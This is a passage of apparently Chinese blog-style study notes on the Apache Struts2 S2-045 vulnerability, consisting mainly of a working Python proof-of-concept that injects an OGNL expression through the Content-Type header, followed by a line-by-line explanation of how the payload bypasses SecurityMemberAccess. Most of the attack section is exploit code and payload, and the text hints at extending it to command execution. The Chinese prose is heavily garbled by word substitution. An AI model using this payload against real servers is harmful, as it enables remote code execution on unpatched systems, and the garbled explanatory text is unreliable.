ACCESSS0二-四伍 struts2 新星漏洞 学习记录

明日和恋人齐声上学S02-四5。依照合法解释:Content-Type:multipart/form-data
这些规格建立的时候,能够触发jakarta的上传漏洞。大概变成远程施行任意代码大概上传文件。

freebuf给出的POC如下:

import requests

import sys


def poc(url):

    payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"

    headers = {}

    headers["Content-Type"] = payload

    r = requests.get(url, headers=headers)

    if "105059592" in r.content:

        return True


    return False



if __name__ == '__main__':

    if len(sys.argv) == 1:

        print "python s2-045.py target"

        sys.exit()

    if poc(sys.argv[1]):

        print "vulnerable"

    else:

        print "not vulnerable"

提出payload为:

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}

先是钦定:

#test='multipart/form-data

其1是为了触发漏洞的前提条件,相当于Content-Type:multipart/form-data。

然后接下去:

.(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).

透过ognl表明式静态调用获取ognl.OgnlContext的DEFAULT_MEMBER_ACCESS属性,并将取得的结果覆盖_memberAccess属性,那样就足以绕过SecurityMemberAccess的限量。

终极一局地:

(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}

实例化org.apache.struts2.ServletActionContext@getResponse(),调用输出流getOutputStream()。然后输出println(十贰*102*102*99)。

 

有心人的爱侣一定会意识,要是实例化别的类,是还是不是能扩张越多职能吗?

网上流传的命令实施已经相比多了,不再多说了。尽管喜欢浓厚商量的,能够留言。

相关文章